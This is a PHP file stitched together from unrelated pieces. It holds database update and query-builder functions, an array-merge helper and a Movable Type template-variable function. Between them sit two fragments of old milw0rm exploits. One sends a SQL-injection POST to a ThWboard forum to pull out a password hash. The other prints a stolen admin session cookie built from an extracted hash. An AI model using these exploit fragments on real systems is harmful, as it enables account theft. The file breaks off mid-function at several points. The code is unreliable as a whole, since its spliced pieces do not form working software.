    if (is_object($dataobject)) { $dataobject = clone $dataobject; }
    if (empty($where)) {
        $where = 'id';
        if (!isset($dataobject->id)) {
            // nothing to put in the where clause and we don't want to update everything
            throw new SQLException('update_record called with no where clause and no ID');
        }
    }
    $wherefields = array(); $wherevalues = array(); $values = array();
    if (is_string($where)) {
        // treat it like a stack (ie, field in dataobject)
        $where = array($where);
    }
    if (is_object($where) || is_hash($where)) {
        // the values are contained in the where ...
        foreach ((array) $where as $field => $value) {
            $wherefields[] = $field; $wherevalues[] = $value; unset($dataobject->{$field});
        }
    } else {
        if (is_array($where)) {
            // look for the values in $dataobject and complain bitterly if they're not there
            // NOTE(review): the docblock allows an array $dataobject, but this path dereferences it with ->.
            foreach ($where as $field) {
                if (!isset($dataobject->{$field})) { throw new SQLException('Field in where clause not in the update object'); }
                $wherefields[] = $field; $wherevalues[] = $dataobject->{$field}; unset($dataobject->{$field});
            }
        } else {
            throw new SQLException('the $where object is in a very odd form');
        }
    }
    // Per-request cache of column metadata, keyed by table name.
    static $table_columns;
    // Determine all the fields in the table
    if (is_array($table_columns) && isset($table_columns[$table])) {
        $columns = $table_columns[$table];
    } else {
        if (!($columns = $db->MetaColumns(get_config('dbprefix') . $table))) {
            throw new SQLException('Could not get columns for table ' . $table);
        }
        $table_columns[$table] = $columns;
    }
    $data = (array) $dataobject;
    // Pull out data matching these fields
    // Only columns that exist in the table and are not part of the WHERE are written.
    $ddd = array();
    foreach ($columns as $column) {
        if (!in_array($column->name, $wherefields) && array_key_exists($column->name, $data)) {
            $ddd[$column->name] = $data[$column->name];
            // PostgreSQL bytea support
            if (is_postgres() && $column->type == 'bytea') {
                $ddd[$column->name] = $db->BlobEncode($ddd[$column->name]);
            }
        }
    }
    // Construct SQL queries
    // NOTE(review): with no matching columns $update stays '' and the resulting
    // "UPDATE ... SET  WHERE ..." fails at the database rather than here.
    $numddd = count($ddd);
    $count = 0;
    $update = '';
    foreach ($ddd as $key => $value) {
        $count++;
        $update .= db_quote_identifier($key) . ' = ? ';
        if ($count < $numddd) { $update .= ', '; }
        $values[] = $value;
    }
    $whereclause = '';
    $count = 0;
    $numddd = count($wherefields);
    foreach ($wherefields as $field) {
        $count++;
        $whereclause .= db_quote_identifier($field) . ' = ? ';
        if ($count < $numddd) { $whereclause .= ' AND '; }
    }
    $sql = 'UPDATE ' . db_table_name($table) . ' SET ' . $update . ' WHERE ' . $whereclause;
    try {
        $stmt = $db->Prepare($sql);
        increment_perf_db_writes();
        // Bind order matches the placeholder order: SET values first, then WHERE values.
        $rs = $db->Execute($stmt, array_merge($values, $wherevalues));
        return true;
    } catch (ADODB_Exception $e) {
        throw new SQLException(create_sql_exception_message($e, $sql, array_merge($values, $wherevalues)));
    }
}
/**
 * Build a SQLBuilder from a find() options hash.
 *
 * Recognised keys: from, joins, select, conditions (string, positional list,
 * or hash), mapped_names, order, limit, offset, group, having. Apart from a
 * conditions hash (which is rendered by the builder), the fragments are
 * forwarded as-is, so they must originate from trusted code rather than
 * request input.
 *
 * @param array $options Options hash.
 * @return SQLBuilder
 */
public function options_to_sql($options)
{
    $table = array_key_exists('from', $options)
        ? $options['from']
        : $this->get_fully_qualified_table_name();
    $builder = new SQLBuilder($this->conn, $table);

    if (array_key_exists('joins', $options)) {
        $builder->joins($this->create_joins($options['joins']));
        // by default, an inner join will not fetch the fields from the joined table
        if (!array_key_exists('select', $options)) {
            $options['select'] = $this->get_fully_qualified_table_name() . '.*';
        }
    }
    if (array_key_exists('select', $options)) {
        $builder->select($options['select']);
    }

    if (array_key_exists('conditions', $options)) {
        $conditions = $options['conditions'];
        if (is_hash($conditions)) {
            if (!empty($options['mapped_names'])) {
                $conditions = $this->map_names($conditions, $options['mapped_names']);
            }
            $builder->where($conditions);
        } else {
            // A bare string is a SQL fragment with no bind values.
            $positional = is_string($conditions) ? array($conditions) : $conditions;
            call_user_func_array(array($builder, 'where'), $positional);
        }
    }

    // Simple pass-through clauses, applied in the original order.
    $clauses = array('order', 'limit', 'offset', 'group', 'having');
    foreach ($clauses as $clause) {
        if (array_key_exists($clause, $options)) {
            $builder->$clause($options[$clause]);
        }
    }

    return $builder;
}
$data = "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n"; $data .= "{$SQL}\r\n"; $data .= "-----------------------------7d61bcd1f033e--\r\n"; $packet = "POST " . $p . "index.php HTTP/1.0\r\n"; $packet .= "SUNTZU: " . $argu . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("<pre><b>ThWboard Error</b><br>", $html)) { echo $html; die("\n\nquery error... see html"); } $temp = explode("templates/", $html); $temp2 = explode("/", $temp[1]); $pwd_hash = $temp2[0]; if (is_hash($pwd_hash)) { die("pwd hash (md5) -> " . $pwd_hash . "\n"); } if (eregi("templates//frame.html", $html)) { echo "no user with given name...\n"; } echo "exploit failed...\n\n" . $html; } ?> # milw0rm.com [2007-01-14]
/**
 * Recursively merge two values, in the spirit of array_merge_recursive but
 * without duplicating list entries.
 *
 *  - two hashes: merged key by key, recursing on each key;
 *  - two lists: concatenated, duplicates dropped keeping the last occurrence;
 *  - anything else: $arr2 wins when truthy, otherwise $arr1 is kept.
 *
 * Originally written by dev-null@christophe.vg; taken from the PHP manual
 * notes on array_merge_recursive.
 *
 * @param mixed $arr1 Old value.
 * @param mixed $arr2 New value.
 * @return mixed The merged value.
 */
function array_join_merge($arr1, $arr2)
{
    if (!(is_array($arr1) && is_array($arr2))) {
        // not the same ... take new one if defined, else the old one stays
        return $arr2 ? $arr2 : $arr1;
    }

    if (!(is_hash($arr1) && is_hash($arr2))) {
        // two real arrays -> merge, keeping the last occurrence of a duplicate
        $joined = array_merge($arr1, $arr2);
        return array_reverse(array_unique(array_reverse($joined)));
    }

    // hashes -> merge based on keys; a key missing on one side recurses with null
    $merged = array();
    foreach (array_merge(array_keys($arr1), array_keys($arr2)) as $k) {
        $left = array_key_exists($k, $arr1) ? $arr1[$k] : null;
        $right = array_key_exists($k, $arr2) ? $arr2[$k] : null;
        $merged[$k] = array_join_merge($left, $right);
    }
    return $merged;
}
} if ($i == 255) { die("\nExploit failed..."); } } $j++; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($password)) { print_r(' -------------------------------------------------------------------------- cookie -> wbb_userid=' . $uid . '; wbb_userpassword='******'; -------------------------------------------------------------------------- '); if ($uid == 1) { echo "done, but... to have access to admin panel you need to break the hash\n"; } } else { echo "exploit failed..."; } ?> # milw0rm.com [2006-11-23]
/**
 * MTVar / MTGetVar: read a template variable and return it, optionally after
 * hash/array access, a function (delete, count, pop, shift), an arithmetic op,
 * a default, and an escape (js, html, url).
 *
 * With value= but no op= the call is forwarded to MTSetVar. Names of the
 * form "config.X" return the config entry unless X contains "password";
 * "request.X" returns the raw $_REQUEST entry.
 *
 * @param array $args Tag attributes (name|var, function, index, key, op,
 *                    value, to_json, default, escape).
 * @param object &$ctx Template context; errors are reported via $ctx->error().
 * @return mixed The variable's value (or a derived scalar), or $ctx->error()'s return value.
 */
function smarty_function_mtvar($args, &$ctx) {
    // status: complete
    // parameters: name
    if (array_key_exists('value', $args) && !array_key_exists('op', $args)) {
        require_once "function.mtsetvar.php";
        return smarty_function_mtsetvar($args, $ctx);
    }
    require_once "MTUtil.php";
    $vars =& $ctx->__stash['vars'];
    $value = '';
    $name = $args['name'];
    $name or $name = $args['var'];
    if (preg_match('/^(config|request)\\.(.+)$/i', $name, $m)) {
        if (strtolower($m[1]) == 'config') {
            // Config entries whose name contains "password" are withheld from templates.
            if (!preg_match('/password/i', $m[2])) {
                global $mt;
                // NOTE(review): config is read as an array here but called as a method ($mt->config(...)) below -- confirm which is right.
                return $mt->config[strtolower($m[2])];
            }
        } elseif (strtolower($m[1]) == 'request') {
            // Raw request input, returned before the escape= handling below is reached.
            return $_REQUEST[$m[2]];
        }
    }
    if (!$name) { return ''; }
    // "func(name)" syntax takes precedence over an explicit function= attribute.
    if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
        $func = $matches[1];
        $name = $matches[2];
    } else {
        if (array_key_exists('function', $args)) {
            $func = $args['function'];
        }
    }
    # pick off any {...} or [...] from the name.
    if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
        $name = $matches[1];
        $br = $matches[2];
        $ref = $matches[3];
        // NOTE(review): this pattern matches a literal backslash before the "$"
        // (mtsetvar uses '/^\$(.+)/' for the same purpose); possibly over-escaped -- confirm.
        if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
            $ref = $vars[$ref_matches[1]];
            if (!isset($ref)) { $ref = chr(0); }
        }
        // Ternary used for its side effect: '[' selects an array index, '{' a hash key.
        $br == '[' ? $index = $ref : ($key = $ref);
    } else {
        if (array_key_exists('index', $args)) {
            $index = $args['index'];
        } else {
            if (array_key_exists('key', $args)) {
                $key = $args['key'];
            }
        }
    }
    // Indirect name: "$foo" means "the variable whose name is stored in foo".
    if (preg_match('/^\\$/', $name)) {
        $name = $vars[$name];
        if (!isset($name)) {
            // NOTE(review): $tag is never assigned in this function, so the message interpolates an empty tag name.
            return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>"));
        }
    }
    if (isset($vars[$name])) { $value = $vars[$name]; }
    // Lazily-compiled template functions are stored by name; expand them here.
    if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
        if (function_exists($value)) {
            ob_start();
            $value($ctx, array());
            $value = ob_get_contents();
            ob_end_clean();
        } else {
            $value = '';
        }
    }
    $return_val = $value;
    if (isset($name)) {
        if (is_hash($value)) {
            if (isset($key)) {
                if (isset($func)) {
                    // delete: return the removed member and write the hash back.
                    if ('delete' == strtolower($func)) {
                        $return_val = $value[$key];
                        unset($value[$key]);
                        $vars[$name] = $value;
                    } else {
                        return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
                    }
                } else {
                    // chr(0) is the marker for an unresolved "$var" key.
                    if ($key != chr(0)) {
                        $return_val = $value[$key];
                    } else {
                        unset($value);
                    }
                }
            } elseif (isset($func)) {
                if ('count' == strtolower($func)) {
                    $return_val = count(array_keys($value));
                } else {
                    return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
                }
            } else {
                if (array_key_exists('to_json', $args) && $args['to_json']) {
                    if (function_exists('json_encode')) {
                        $return_val = json_encode($value);
                    } else {
                        $return_val = '';
                    }
                }
            }
        } elseif (is_array($value)) {
            if (isset($index)) {
                if (is_numeric($index)) {
                    $return_val = $value[$index];
                } else {
                    unset($value); # fall through to any 'default'
                }
            } elseif (isset($func)) {
                // pop/shift mutate the stored array; count is read-only.
                $func = strtolower($func);
                if ('pop' == $func) {
                    $return_val = array_pop($value);
                    $vars[$name] = $value;
                } elseif ('shift' == $func) {
                    $return_val = array_shift($value);
                    $vars[$name] = $value;
                } elseif ('count' == $func) {
                    $return_val = count($value);
                } else {
                    return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for an array.", $func));
                }
            } else {
                if (array_key_exists('to_json', $args) && $args['to_json']) {
                    if (function_exists('json_encode')) {
                        $return_val = json_encode($value);
                    } else {
                        $return_val = '';
                    }
                }
            }
        }
        if (array_key_exists('op', $args)) {
            $op = $args['op'];
            $rvalue = $args['value'];
            if ($op && isset($value) && !is_array($value)) {
                $return_val = _math_operation($op, $value, $rvalue);
                if (!isset($return_val)) {
                    return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $value, $op, $rvalue));
                }
            }
        }
    }
    // Loose comparison: on PHP < 8 a numeric 0 also equals '' and is replaced by the default.
    if ($return_val == '') {
        if (isset($args['default'])) {
            $return_val = $args['default'];
        }
    }
    if (isset($args['escape'])) {
        $esc = strtolower($args['escape']);
        if ($esc == 'js') {
            $return_val = encode_js($return_val);
        } elseif ($esc == 'html') {
            // ENT_COMPAT leaves single quotes unescaped, so the result is only safe in
            // element content or double-quoted attributes, not single-quoted ones.
            if (version_compare(phpversion(), '4.3.0', '>=')) {
                global $mt;
                $charset = $mt->config('PublishCharset');
                $return_val = htmlentities($return_val, ENT_COMPAT, $charset);
            } else {
                $return_val = htmlentities($return_val, ENT_COMPAT);
            }
        } elseif ($esc == 'url') {
            // urlencode() emits '+' for spaces; normalise to %20.
            $return_val = urlencode($return_val);
            $return_val = preg_replace('/\\+/', '%20', $return_val);
        }
    }
    return $return_val;
}
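/**
 * Translate where arguments into $this->where / $this->where_values.
 *
 * A single hash is rendered through Expressions. Otherwise $args[0] is a SQL
 * fragment with bind markers (it is used verbatim, so it must come from
 * trusted code and never from request input) and the remaining arguments are
 * its bind values; a nested array among them is expanded through Expressions
 * so the marker matches its element count.
 *
 * Fix: the original scanned the values with a by-reference foreach and never
 * unset the loop variable, leaving the last element aliased inside the array
 * that became $this->where_values. The scan is now by value.
 *
 * @param array $args Where arguments as passed by the caller.
 * @return void
 */
private function apply_where_conditions($args)
{
    $num_args = count($args);
    if ($num_args == 1 && is_hash($args[0])) {
        $e = new Expressions($args[0]);
        $e->set_connection($this->connection);
        $this->where = $e->to_s();
        $this->where_values = array_flatten($e->values());
        return;
    }

    if ($num_args <= 0) {
        return;
    }

    $values = array_slice($args, 1);

    // By-value scan: we only need to know whether any bind value is an array.
    $has_nested = false;
    foreach ($values as $value) {
        if (is_array($value)) {
            $has_nested = true;
            break;
        }
    }

    if ($has_nested) {
        // Expressions expands the marker for the nested array into one marker per element.
        $e = new Expressions($args[0]);
        $e->set_connection($this->connection);
        $e->bind_values($values);
        $this->where = $e->to_s();
        $this->where_values = array_flatten($e->values());
        return;
    }

    // No nested array, so the fragment and its values are used directly.
    $this->where = $args[0];
    $this->where_values = $values;
}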